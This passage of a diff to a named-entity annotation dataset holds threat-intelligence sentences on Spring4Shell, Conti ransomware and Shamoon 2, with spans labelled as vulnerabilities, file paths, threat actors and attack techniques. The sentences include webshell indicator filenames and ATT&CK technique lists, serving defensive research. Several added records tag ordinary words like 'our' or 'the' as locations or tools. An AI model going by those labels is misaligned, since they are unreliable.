8.","entities":[{"id":45534,"label":"SOFTWARE","start_offset":85,"end_offset":95},{"id":45536,"label":"TIME","start_offset":137,"end_offset":144},{"id":45535,"label":"TIME","start_offset":125,"end_offset":132}],"relations":[],"Comments":[]} -{"id":2485,"text":"A majority of these alerts are triggered by testing of the proof-of-concept tools previously mentioned above.","entities":[],"relations":[],"Comments":[]} -{"id":2486,"text":"We also observed several alerts involving a docker container named spring4shell, which had a \/helloworld directory and had a listening port tcp\/8080.","entities":[{"id":47565,"label":"vulnerability","start_offset":67,"end_offset":79}],"relations":[],"Comments":[]} -{"id":2487,"text":"We believe these docker containers are also part of internal testing efforts using publicly available docker containers, such as Spring4Shell-POC.","entities":[{"id":45537,"label":"vulnerability","start_offset":129,"end_offset":145}],"relations":[],"Comments":[]} -{"id":2488,"text":"The signature triggered on the creation of the webshell files, of which we observed the following file written: \/usr\/local\/tomcat\/work\/Catalina\/localhost\/ROOT\/org\/apache\/jsp\/shell_jsp.java \/usr\/local\/tomcat\/webapps\/ROOT\/shell_.jsp SpringShell is officially assigned CVE-2022-22965, and the patch was released on March 31, 2022.","entities":[{"id":47567,"label":"FILEPATH","start_offset":190,"end_offset":231},{"id":47568,"label":"vulnerability","start_offset":268,"end_offset":282},{"id":47570,"label":"vulnerability","start_offset":233,"end_offset":244},{"id":47566,"label":"FILEPATH","start_offset":113,"end_offset":189},{"id":47569,"label":"TIME","start_offset":314,"end_offset":328},{"id":47571,"label":"attack-pattern","start_offset":47,"end_offset":55}],"relations":[{"id":337,"from_id":47570,"to_id":47568,"type":"related-to"},{"id":339,"from_id":47570,"to_id":47567,"type":"consists-of"},{"id":340,"from_id":47570,"to_id":47566,"type":"consists-of"}],"Comments":[]} -{"id":2489,"text":"Since exploitation is straightforward and all the relevant technical details have already gone viral on the internet, it’s possible that SpringShell will become fully weaponized and abused on a larger scale.","entities":[{"id":47572,"label":"vulnerability","start_offset":137,"end_offset":148}],"relations":[],"Comments":[]} -{"id":2490,"text":"Developers and users who have projects or products based on JDK9+ and the Spring Framework (or its derivatives) are strongly urged to patch as soon as possible.","entities":[{"id":45538,"label":"SOFTWARE","start_offset":60,"end_offset":65},{"id":45539,"label":"SOFTWARE","start_offset":74,"end_offset":90}],"relations":[],"Comments":[]} -{"id":2491,"text":" While CVE-2022-22963 is a different vulnerability in Spring Cloud Function (not technically part of SpringShell), a Threat Prevention signature is also available to ensure coverage at the perimeter.","entities":[{"id":47575,"label":"vulnerability","start_offset":101,"end_offset":112},{"id":47573,"label":"vulnerability","start_offset":7,"end_offset":21},{"id":47574,"label":"SOFTWARE","start_offset":54,"end_offset":66}],"relations":[{"id":341,"from_id":47574,"to_id":47573,"type":"has"}],"Comments":[]} -{"id":2492,"text":"Unit 42 researchers are proactively monitoring info related to other recently disclosed Spring vulnerabilities and will proceed to provide coverage as soon as more info has become available.","entities":[{"id":7440,"label":"identity","start_offset":0,"end_offset":7},{"id":47576,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} +{"id":9616,"text":"We\u2019ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[{"id":29454,"label":"tools","start_offset":70,"end_offset":76},{"id":29455,"label":"location","start_offset":77,"end_offset":80},{"id":29456,"label":"location","start_offset":81,"end_offset":89},{"id":29457,"label":"location","start_offset":112,"end_offset":115},{"id":29458,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} +{"id":9711,"text":"Other bytes are just randomly generated noise.","entities":[{"id":29625,"label":"location","start_offset":12,"end_offset":15},{"id":29626,"label":"identity","start_offset":16,"end_offset":20}],"relations":[],"Comments":[]} +{"id":5591,"text":"Avoid connecting a NAS device directly to the internet.","entities":[],"relations":[],"Comments":[]} +{"id":3910,"text":"Initial access","entities":[],"relations":[],"Comments":[]} {"id":2493,"text":" Unit 42 is actively monitoring malicious traffic through our devices and cloud solutions.","entities":[{"id":45540,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":2494,"text":" The Palo Alto Networks Product Security Assurance team is evaluating CVE-2022-22963 and CVE-2022-22965 as relates to Palo Alto Networks products and currently assigns this a severity of none.","entities":[{"id":47577,"label":"identity","start_offset":5,"end_offset":55},{"id":47578,"label":"vulnerability","start_offset":70,"end_offset":84},{"id":47580,"label":"identity","start_offset":118,"end_offset":136},{"id":47579,"label":"vulnerability","start_offset":89,"end_offset":103}],"relations":[],"Comments":[]} -{"id":2495,"text":" Palo Alto Networks Next-Generation Firewall with a Threat Prevention subscription can block the attack traffic related to this vulnerability. Palo Alto Networks Prisma Cloud can detect the presence of both CVE-2022-22965 and CVE-2022-22963 across all Compute environments.","entities":[{"id":47583,"label":"vulnerability","start_offset":208,"end_offset":222},{"id":47582,"label":"SOFTWARE","start_offset":144,"end_offset":175},{"id":47581,"label":"SOFTWARE","start_offset":2,"end_offset":69},{"id":47584,"label":"vulnerability","start_offset":227,"end_offset":241}],"relations":[],"Comments":[]} -{"id":2496,"text":"Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules.","entities":[{"id":47587,"label":"vulnerability","start_offset":159,"end_offset":173},{"id":47585,"label":"SOFTWARE","start_offset":0,"end_offset":45},{"id":47588,"label":"SOFTWARE","start_offset":184,"end_offset":211},{"id":47590,"label":"vulnerability","start_offset":313,"end_offset":327},{"id":47591,"label":"SOFTWARE","start_offset":337,"end_offset":344},{"id":47593,"label":"SOFTWARE","start_offset":365,"end_offset":392},{"id":47586,"label":"SOFTWARE","start_offset":126,"end_offset":131},{"id":47589,"label":"vulnerability","start_offset":294,"end_offset":308},{"id":47592,"label":"SOFTWARE","start_offset":349,"end_offset":354}],"relations":[{"id":342,"from_id":47587,"to_id":47588,"type":"related-to"}],"Comments":[]} -{"id":2497,"text":"Cortex XDR Pro customers also have visibility into post-exploitation activities and can specifically track the “Process execution with a suspicious command line indicative of the Spring4Shell exploit” and “Suspicious HTTP Request to a vulnerable Java class” Analytics BIOCs.","entities":[{"id":47598,"label":"vulnerability","start_offset":206,"end_offset":256},{"id":47599,"label":"vulnerability","start_offset":112,"end_offset":199},{"id":47594,"label":"SOFTWARE","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} -{"id":2498,"text":"Furthermore, customers can create a BIOC from an XQL query looking for the dropped webshell IoCs to detect exploitation attempts in their environments.","entities":[{"id":47600,"label":"attack-pattern","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} -{"id":2499,"text":" Palo Alto Networks Cortex XSOAR customers can leverage the \"Spring Core and Cloud Function SpEL RCEs\" pack to automatically detect and mitigate the vulnerabilities.","entities":[{"id":47597,"label":"vulnerability","start_offset":61,"end_offset":101},{"id":47596,"label":"SOFTWARE","start_offset":1,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2500,"text":"Read more on the XSOAR marketplace.","entities":[{"id":47601,"label":"SOFTWARE","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} -{"id":2501,"text":"Prisma Cloud Mitigations for SpringShell and Recent Spring Vulnerabilities: CVE-2022-22963, CVE-2022-22965 How Cortex XDR Blocks SpringShell Exploits 0808a56a90ca2f8b1e91a1e60b7b451e.txt 0c901fefcae46ba984225aa72df0825c.txt 1532b681733b6bce2ff7252d8890d550.txt 28fcea06661f13ebe9c87327f949f3a8.txt 2b98432e352ff74569b81099dd5ee246.txt 4acbedbe977480d19b7b682d4878cae2.txt 4fdd6fbd220e26b63a7c9a5aa88f5f31.txt 5657e4634210a3d47a789d1389a89320.txt 646bbc2c112070c26b3c042e81c6947e.txt 70b98d30e383df910ce3d693603404fb.txt 73be7d1ef52c3dbc9a5d726288d8a4ba.txt 83d81ef47f0e9a205fb66a100f3179bf.txt 8592f3e430720d324d7cfd7ecd1de521.txt 8697f146477832389449cf2548032ca7.txt Shell.jsp UJaez.jsp Y4kws.jsp a6bfc76094f689dab978f059ea2456a1.txt aniwvzgvwqnwtehgsfsgbslwoiqkjk.jsp appli12 baf24e5f9fc18cf58172d1ba745f0f7a.txt c41fc8f359d1658559c2d1c0043c76fb.txt cbsewlaeqsdsqktavziakyzsuwfciu.jsp czbwzitpzjzkcvkrirybzihsibmuej.jsp czpdnhpraxgzrtatiuigsalfedwwit.jsp dnuurzjtlbjrnuukwdmaltqrqqlaig.jsp duvdqpoyrcapqbfcetgwsqxfkslubw.jsp ee947d98b91c8ada08f8c15e8f3248fc.txt efdde87c66fe4e6dc73a2ab6111ca58a.txt facb4be5385617bf11e6d67f0aa0203b.txt ggoibjvztvlpelaghjzeweqmopjosz.jsp goocmasqxwfufyxrgyachwidxdotkh.jsp hlbpgpqsyracfnvkgrgvlhcptpmdfn.jsp hmmyitbecwhmrdicykmfvqlcsknbff.jsp hnmqeuzumlokxuhqyekeetrgougeof.jsp ilvckpgzbrcdljyqdfhqendqcwhgxp.jsp izodfyvqujwztweclykgozahdlqvqp.jsp jynrrkjghebemkrhvfzllrepzosinb.jsp kqbnngrfnsxlreajyknuimoamysvwt.jsp ltcovlwqkckjpuzbqzbjdpkgkakvno.jsp mhoqqvpuxdqtuqzmwdrvdeayqvlygb.jsp osanxuadyvjaiorcjfqnckfpewunnt.jsp ptipfhjosfvrfwndwqccapozcbasge.jsp pxwcqxzrstepmbwufjxuaydkwgmvds.jsp qnzfvqpeiljtoyvrywrkuvkrmuewzn.jsp rQFlA.jsp rmdwahilztwhhqnmcbodkgtbnmrhjx.jsp tomcat74935.jsp ubekdurthzexowlohzgienbwvexynd.jsp ufoubgkazumxhqvwlnyfejnmyqofcm.jsp ujpmauuhltvsokjracgwkbflkhhnwo.jsp vkmckfvljtpbyowxwhgbjsvyktfdiq.jsp xcoihpiouaamtnbqqvcvffyxyrokvn.jsp yjjhhdlxepozhirznemjabnsciycvv.jsp yutugdqbrossntwaujgxwgrpgczkbd.jsp zawpiupzzsjexllfbicrgvlcuxzqyb.jsp zqgwtzyrexctiyvsawmwttncwzoyyd.jsp zuvuegtemzfsyqjfykowggxpqkuqdp.jsp 0xd0m7.jsp crashed_log_","entities":[{"id":47623,"label":"FILEPATH","start_offset":669,"end_offset":678},{"id":47602,"label":"vulnerability","start_offset":76,"end_offset":90},{"id":47603,"label":"vulnerability","start_offset":92,"end_offset":106},{"id":47604,"label":"SOFTWARE","start_offset":0,"end_offset":12},{"id":47605,"label":"vulnerability","start_offset":29,"end_offset":40},{"id":47608,"label":"vulnerability","start_offset":129,"end_offset":149},{"id":47609,"label":"FILEPATH","start_offset":151,"end_offset":187},{"id":47610,"label":"FILEPATH","start_offset":188,"end_offset":224},{"id":47611,"label":"FILEPATH","start_offset":225,"end_offset":261},{"id":47606,"label":"SOFTWARE","start_offset":52,"end_offset":58},{"id":47607,"label":"SOFTWARE","start_offset":111,"end_offset":121},{"id":47619,"label":"FILEPATH","start_offset":521,"end_offset":557},{"id":47620,"label":"FILEPATH","start_offset":558,"end_offset":594},{"id":47621,"label":"FILEPATH","start_offset":595,"end_offset":631},{"id":47622,"label":"FILEPATH","start_offset":632,"end_offset":668},{"id":47624,"label":"FILEPATH","start_offset":679,"end_offset":688},{"id":47625,"label":"FILEPATH","start_offset":689,"end_offset":698},{"id":47626,"label":"FILEPATH","start_offset":699,"end_offset":735},{"id":47627,"label":"FILEPATH","start_offset":736,"end_offset":770},{"id":47628,"label":"FILEPATH","start_offset":779,"end_offset":815},{"id":47629,"label":"FILEPATH","start_offset":816,"end_offset":852},{"id":47630,"label":"FILEPATH","start_offset":853,"end_offset":887},{"id":47631,"label":"FILEPATH","start_offset":888,"end_offset":922},{"id":47633,"label":"FILEPATH","start_offset":958,"end_offset":992},{"id":47612,"label":"FILEPATH","start_offset":262,"end_offset":298},{"id":47613,"label":"FILEPATH","start_offset":299,"end_offset":335},{"id":47614,"label":"FILEPATH","start_offset":336,"end_offset":371},{"id":47615,"label":"FILEPATH","start_offset":373,"end_offset":409},{"id":47616,"label":"FILEPATH","start_offset":410,"end_offset":446},{"id":47617,"label":"FILEPATH","start_offset":447,"end_offset":483},{"id":47618,"label":"FILEPATH","start_offset":484,"end_offset":520},{"id":47632,"label":"FILEPATH","start_offset":923,"end_offset":957},{"id":47634,"label":"FILEPATH","start_offset":993,"end_offset":1027},{"id":47635,"label":"FILEPATH","start_offset":1028,"end_offset":1064},{"id":47637,"label":"FILEPATH","start_offset":1065,"end_offset":1101},{"id":47638,"label":"FILEPATH","start_offset":1102,"end_offset":1138},{"id":47645,"label":"FILEPATH","start_offset":1349,"end_offset":1383},{"id":47650,"label":"FILEPATH","start_offset":1524,"end_offset":1558},{"id":47652,"label":"FILEPATH","start_offset":1559,"end_offset":1593},{"id":47653,"label":"FILEPATH","start_offset":1594,"end_offset":1628},{"id":47639,"label":"FILEPATH","start_offset":1139,"end_offset":1173},{"id":47640,"label":"FILEPATH","start_offset":1174,"end_offset":1208},{"id":47641,"label":"FILEPATH","start_offset":1209,"end_offset":1243},{"id":47642,"label":"FILEPATH","start_offset":1244,"end_offset":1278},{"id":47643,"label":"FILEPATH","start_offset":1279,"end_offset":1313},{"id":47646,"label":"FILEPATH","start_offset":1384,"end_offset":1418},{"id":47647,"label":"FILEPATH","start_offset":1419,"end_offset":1453},{"id":47648,"label":"FILEPATH","start_offset":1454,"end_offset":1488},{"id":47649,"label":"FILEPATH","start_offset":1489,"end_offset":1523},{"id":47657,"label":"FILEPATH","start_offset":1709,"end_offset":1724},{"id":47658,"label":"FILEPATH","start_offset":1725,"end_offset":1759},{"id":47659,"label":"FILEPATH","start_offset":1760,"end_offset":1794},{"id":47644,"label":"FILEPATH","start_offset":1314,"end_offset":1348},{"id":47654,"label":"FILEPATH","start_offset":1629,"end_offset":1663},{"id":47655,"label":"FILEPATH","start_offset":1664,"end_offset":1673},{"id":47656,"label":"FILEPATH","start_offset":1674,"end_offset":1708},{"id":47660,"label":"FILEPATH","start_offset":1795,"end_offset":1829},{"id":47661,"label":"FILEPATH","start_offset":1830,"end_offset":1864},{"id":47662,"label":"FILEPATH","start_offset":1865,"end_offset":1899},{"id":47663,"label":"FILEPATH","start_offset":1900,"end_offset":1934},{"id":47664,"label":"FILEPATH","start_offset":1935,"end_offset":1969},{"id":47665,"label":"FILEPATH","start_offset":1970,"end_offset":2004},{"id":47666,"label":"FILEPATH","start_offset":2005,"end_offset":2039},{"id":47667,"label":"FILEPATH","start_offset":2040,"end_offset":2074},{"id":47668,"label":"FILEPATH","start_offset":2075,"end_offset":2085},{"id":47669,"label":"FILEPATH","start_offset":2086,"end_offset":2098}],"relations":[],"Comments":[]} -{"id":2502,"text":"gdGCT.jsp","entities":[{"id":45552,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":2503,"text":"myshell.jsp","entities":[{"id":47670,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2504,"text":"rakesh.jsp","entities":[{"id":47673,"label":"FILEPATH","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2505,"text":"shei1.jsp","entities":[{"id":45553,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":2506,"text":"shell13.jsp","entities":[{"id":47674,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2507,"text":"tomcatlogin.jsp","entities":[{"id":47676,"label":"FILEPATH","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":2508,"text":"data_theorem_spring4shell_scan.txt","entities":[{"id":45555,"label":"FILEPATH","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} -{"id":2509,"text":"jarom_h1.jsp","entities":[{"id":47677,"label":"FILEPATH","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2510,"text":"jquery123123123cssbackup7331.jsp tomjj.jsp test1.jsp hackerone0x.jsp inject.jsp poc4bugb.jsp curiositysec.jsp mynameis0bsecure.jsp tomcatwa.jsp ahmed.txt testqqsg.jsp wpz.jsp lelel.jsp shell.jsp 07935fdf05b66.jsp vulntest-12345.txt jquerycssv2.js poc.jsp tomcatspring.jsp ofc.jsp lalalalal.jsp safetytest.txt log.txt safetytest javatestfila.jsp checkexploit.jsp tomcatwar.jsp Updated April 19, 2022, at 7:30 a.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[{"id":47693,"label":"FILEPATH","start_offset":185,"end_offset":194},{"id":47678,"label":"FILEPATH","start_offset":0,"end_offset":32},{"id":47683,"label":"FILEPATH","start_offset":80,"end_offset":92},{"id":47685,"label":"FILEPATH","start_offset":93,"end_offset":109},{"id":47700,"label":"FILEPATH","start_offset":280,"end_offset":293},{"id":47704,"label":"FILEPATH","start_offset":328,"end_offset":344},{"id":47705,"label":"FILEPATH","start_offset":345,"end_offset":361},{"id":47706,"label":"FILEPATH","start_offset":362,"end_offset":375},{"id":47708,"label":"TIME","start_offset":377,"end_offset":416},{"id":47679,"label":"FILEPATH","start_offset":33,"end_offset":42},{"id":47680,"label":"FILEPATH","start_offset":43,"end_offset":52},{"id":47681,"label":"FILEPATH","start_offset":53,"end_offset":68},{"id":47682,"label":"FILEPATH","start_offset":69,"end_offset":79},{"id":47686,"label":"FILEPATH","start_offset":110,"end_offset":130},{"id":47687,"label":"FILEPATH","start_offset":131,"end_offset":143},{"id":47688,"label":"FILEPATH","start_offset":144,"end_offset":152},{"id":47689,"label":"FILEPATH","start_offset":154,"end_offset":166},{"id":47690,"label":"FILEPATH","start_offset":167,"end_offset":174},{"id":47694,"label":"FILEPATH","start_offset":195,"end_offset":212},{"id":47695,"label":"FILEPATH","start_offset":213,"end_offset":231},{"id":47692,"label":"FILEPATH","start_offset":175,"end_offset":184},{"id":47697,"label":"FILEPATH","start_offset":247,"end_offset":254},{"id":47696,"label":"FILEPATH","start_offset":232,"end_offset":246},{"id":47698,"label":"FILEPATH","start_offset":255,"end_offset":271},{"id":47699,"label":"FILEPATH","start_offset":272,"end_offset":279},{"id":47702,"label":"FILEPATH","start_offset":294,"end_offset":308},{"id":47703,"label":"FILEPATH","start_offset":309,"end_offset":316}],"relations":[],"Comments":[]} -{"id":2511,"text":"This post is also available in: 日本語 (Japanese) Conti ransomware stands out as one of the most ruthless of the dozens of ransomware gangs that we follow.","entities":[{"id":45556,"label":"threat-actor","start_offset":53,"end_offset":69}],"relations":[],"Comments":[]} -{"id":2512,"text":"The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services and law enforcement agencies.","entities":[],"relations":[],"Comments":[]} -{"id":2513,"text":"Ireland has yet to recover from an attack in mid-May that prompted the shutdown of the entire information technology network of the nation's healthcare system – prompting cancellation of appointments, the shutdown of X-ray systems and delays in COVID testing.","entities":[{"id":47709,"label":"location","start_offset":0,"end_offset":7},{"id":47710,"label":"TIME","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} -{"id":2514,"text":" Conti also stands out as unreliable.","entities":[{"id":45557,"label":"threat-actor","start_offset":1,"end_offset":6}],"relations":[],"Comments":[]} -{"id":2515,"text":"We've seen the group stiff victims who pay ransoms, expecting to be able to recover their data.","entities":[],"relations":[],"Comments":[]} -{"id":2516,"text":" The FBI has connected Conti to more than 400 cyberattacks against organizations worldwide, three-quarters of which are based in the U.S., with demands as high as $25 million.","entities":[{"id":47712,"label":"threat-actor","start_offset":23,"end_offset":28},{"id":47713,"label":"location","start_offset":133,"end_offset":137},{"id":47711,"label":"identity","start_offset":5,"end_offset":8}],"relations":[{"id":343,"from_id":47712,"to_id":47713,"type":"targets"}],"Comments":[]} -{"id":2517,"text":"This makes Conti one of the greediest groups out there.","entities":[{"id":45558,"label":"threat-actor","start_offset":11,"end_offset":16}],"relations":[],"Comments":[]} -{"id":2518,"text":" If you think you may have been impacted, please email unit42-investigations@paloaltonetworks.com or call (866) 4-UNIT42 to get in touch with the Unit 42 Incident Response team.","entities":[{"id":7555,"label":"EMAIL","start_offset":55,"end_offset":97},{"id":47714,"label":"identity","start_offset":146,"end_offset":176}],"relations":[],"Comments":[]} -{"id":2519,"text":" We’ve followed Conti for more than a year through our work helping organizations respond to ransomware attacks.","entities":[{"id":47715,"label":"threat-actor","start_offset":16,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2520,"text":"It appears to be one of many private cybercrime groups that have set up their operations by leveraging the booming ransomware-as-a-service (RaaS) ecosystem.","entities":[],"relations":[],"Comments":[]} -{"id":2521,"text":"Such gangs obtain their foothold in the networks of their victims by purchasing access from other threat actors, who sell it as a commodity.","entities":[{"id":47716,"label":"attack-pattern","start_offset":69,"end_offset":86}],"relations":[],"Comments":[]} -{"id":2522,"text":"They can also procure infrastructure, malware, communications tools and money laundering from other RaaS providers.","entities":[],"relations":[],"Comments":[]} -{"id":2523,"text":"Most of these actors use the same methods of access found in many ransomware attacks, such as phishing emails and exploiting unprotected internet-facing applications, the lack of multi-factor authentication (MFA), as well as the typical avenues used to preserve and enhance access once it’s achieved, such as through the use of Cobalt Strike or PowerShell.","entities":[{"id":47719,"label":"attack-pattern","start_offset":171,"end_offset":212},{"id":47717,"label":"attack-pattern","start_offset":94,"end_offset":109},{"id":47718,"label":"attack-pattern","start_offset":114,"end_offset":165},{"id":47720,"label":"tools","start_offset":328,"end_offset":341},{"id":47721,"label":"tools","start_offset":345,"end_offset":355}],"relations":[],"Comments":[]} -{"id":2524,"text":" These approaches are not particularly clever or sophisticated, but often they are effective.","entities":[],"relations":[],"Comments":[]} -{"id":2525,"text":"Conti’s methodology often follows the “double extortion” approach that many leading ransomware groups are presently using.","entities":[{"id":47722,"label":"threat-actor","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":2526,"text":"When using double extortion, attackers will not only lock up a victim’s files and demand ransom, but they will also steal files and threaten to publish them on a website or otherwise leak them if their initial ransom demand is not met. But Conti’s methods do have atypical elements.","entities":[{"id":47723,"label":"threat-actor","start_offset":241,"end_offset":247}],"relations":[],"Comments":[]} -{"id":2527,"text":" Usually, the more successful ransomware operators put a lot of effort into establishing and maintaining some semblance of “integrity” as a way of facilitating ransom payments from victims.","entities":[],"relations":[],"Comments":[]} -{"id":2528,"text":"They want to establish stellar reputations for “customer service” and for delivering on what they promise – that if you pay a ransom, your files will be decrypted (and they will not appear on a leak website).","entities":[],"relations":[],"Comments":[]} -{"id":2529,"text":"Yet in our experience helping clients remediate attacks, Conti has not demonstrated any signs that it cares about its reputation with would-be victims.","entities":[{"id":45562,"label":"threat-actor","start_offset":57,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2530,"text":" In one recent case, Conti did not return a client’s files who had paid the ransom.","entities":[{"id":47724,"label":"threat-actor","start_offset":21,"end_offset":26}],"relations":[],"Comments":[]} -{"id":2531,"text":"This client got only a small fraction of the file restorations that were promised before the Conti ransomware representatives disappeared back into the dark web.","entities":[{"id":47725,"label":"threat-actor","start_offset":93,"end_offset":98}],"relations":[],"Comments":[]} -{"id":2532,"text":"In another case, our client needed an inventory of all files accessed, so that they could notify parties whose data was affected.","entities":[],"relations":[],"Comments":[]} -{"id":2533,"text":"Conti agreed to share that information if a payment was made, then changed their minds, saying, “We do not own that data anymore.","entities":[],"relations":[],"Comments":[]} -{"id":2534,"text":"It was deleted and there is no chance to restore it.”","entities":[],"relations":[],"Comments":[]} -{"id":2535,"text":"Like many ransomware gangs, Conti is constantly adapting to changes, including recent heightened scrutiny by law enforcement and policy makers following high-profile disruptive attacks on the Colonial pipeline and healthcare organizations.","entities":[{"id":47726,"label":"threat-actor","start_offset":28,"end_offset":33},{"id":47727,"label":"identity","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} -{"id":2536,"text":"When Ireland's healthcare system refused to pay any ransom, Conti provided the agency with what it said was a free decryption key.","entities":[{"id":47728,"label":"location","start_offset":5,"end_offset":12},{"id":47729,"label":"attack-pattern","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2537,"text":"But there was a twist: The group maintained that it would still make good on its \"double extortion\" threat to publish stolen data on its leak site.","entities":[],"relations":[],"Comments":[]} -{"id":2538,"text":" Unfortunately, keeping Conti out of your network often isn’t simple.","entities":[{"id":45565,"label":"threat-actor","start_offset":24,"end_offset":29}],"relations":[],"Comments":[]} -{"id":2539,"text":"A primary means of infection appears to be through phishing scams, and attackers are constantly upping their game in this area.","entities":[{"id":47730,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2540,"text":"While phishing emails used to be pretty easy for almost anyone to spot, particularly after some awareness training, we are seeing increasingly sophisticated attacks in which the threat actors have done plenty of homework on their intended victims.","entities":[{"id":47731,"label":"attack-pattern","start_offset":6,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2541,"text":"Sometimes they’ll send a blitz of scam emails to employees throughout an organization, and it takes only one to open the attachment and release the malware into the network. Ransomware attacks are getting easier to unleash, and the rewards to the attackers are still growing by leaps and bounds.","entities":[{"id":47733,"label":"attack-pattern","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} -{"id":2542,"text":"Accordingly, it continues to be a growth industry that will attract multitudes of new practitioners, and it is likely that high-profile targets will continue to fall.","entities":[],"relations":[],"Comments":[]} -{"id":2543,"text":" Palo Alto Networks detects and prevents Conti ransomware in the following ways: Additionally, Indicators of Compromise (IoCs) associated with Conti are available on GitHub, and have been published to the Unit 42 TAXII feed.","entities":[{"id":47735,"label":"threat-actor","start_offset":41,"end_offset":46},{"id":47734,"label":"identity","start_offset":1,"end_offset":19},{"id":47737,"label":"SOFTWARE","start_offset":167,"end_offset":173},{"id":47738,"label":"SOFTWARE","start_offset":206,"end_offset":213},{"id":47736,"label":"threat-actor","start_offset":144,"end_offset":149}],"relations":[],"Comments":[]} -{"id":2544,"text":" Exploit Public-Facing Application [T1190], Spearphishing Attachment [T1566.001] Windows Command Shell [T1059.003], Native API [T1106] Deobfuscate\/Decode Files or Information [T1140], Obfuscated Files or Information [T1027], Dynamic-link Library Injection [T1055.001] File and Directory Discovery [T1083], Network Share Discovery [T1135], Process Discovery [T1057], System Network Configuration Discovery [T1016], System Network Connections Discovery [T1049] SMB\/Windows Admin Shares [T1021.002], Taint Shared Content [T1080] Data Encrypted for Impact [T1486], Inhibit System Recovery [T1490], Service Stop [T1489] Table 1.","entities":[{"id":45576,"label":"attack-pattern","start_offset":82,"end_offset":115},{"id":45577,"label":"attack-pattern","start_offset":117,"end_offset":135},{"id":45579,"label":"attack-pattern","start_offset":186,"end_offset":225},{"id":45580,"label":"attack-pattern","start_offset":227,"end_offset":269},{"id":45584,"label":"attack-pattern","start_offset":369,"end_offset":415},{"id":45586,"label":"attack-pattern","start_offset":463,"end_offset":499},{"id":45575,"label":"attack-pattern","start_offset":44,"end_offset":80},{"id":45587,"label":"attack-pattern","start_offset":501,"end_offset":529},{"id":45590,"label":"attack-pattern","start_offset":599,"end_offset":619},{"id":45574,"label":"attack-pattern","start_offset":1,"end_offset":42},{"id":45585,"label":"attack-pattern","start_offset":417,"end_offset":461},{"id":45578,"label":"attack-pattern","start_offset":137,"end_offset":184},{"id":45581,"label":"attack-pattern","start_offset":271,"end_offset":307},{"id":45582,"label":"attack-pattern","start_offset":309,"end_offset":340},{"id":45583,"label":"attack-pattern","start_offset":342,"end_offset":367},{"id":45588,"label":"attack-pattern","start_offset":531,"end_offset":564},{"id":45589,"label":"attack-pattern","start_offset":566,"end_offset":597}],"relations":[],"Comments":[]} -{"id":2545,"text":"Courses of Action for Conti ransomware.","entities":[{"id":7672,"label":"threat-actor","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} -{"id":2546,"text":" †These capabilities are part of the NGFW security subscriptions service.","entities":[],"relations":[],"Comments":[]} -{"id":2547,"text":" * These analytic detectors will trigger automatically for Cortex XDR Pro customers.","entities":[{"id":45591,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} -{"id":2548,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2549,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2550,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2551,"text":"Unit 42 researchers have been following the Shamoon 2 attacks closely since November 2016.","entities":[{"id":47739,"label":"identity","start_offset":0,"end_offset":7},{"id":47740,"label":"threat-actor","start_offset":44,"end_offset":53},{"id":47741,"label":"TIME","start_offset":76,"end_offset":89}],"relations":[],"Comments":[]} -{"id":2552,"text":"To date, Shamoon 2 has unfolded in three separate attack waves on November 11, 2016, November 29, 2016, and January 23, 2017.","entities":[{"id":47742,"label":"TIME","start_offset":0,"end_offset":7},{"id":47743,"label":"threat-actor","start_offset":9,"end_offset":18},{"id":47744,"label":"TIME","start_offset":66,"end_offset":83},{"id":47745,"label":"TIME","start_offset":85,"end_offset":102},{"id":47746,"label":"TIME","start_offset":108,"end_offset":124}],"relations":[],"Comments":[]} -{"id":2553,"text":" Based on our newest research, we can answer a question that many have had about these attacks: how is Shamoon 2 able to enter an organization’s network and spread so widely?","entities":[{"id":47747,"label":"threat-actor","start_offset":103,"end_offset":112}],"relations":[],"Comments":[]} -{"id":2554,"text":"The answer is simple: credential 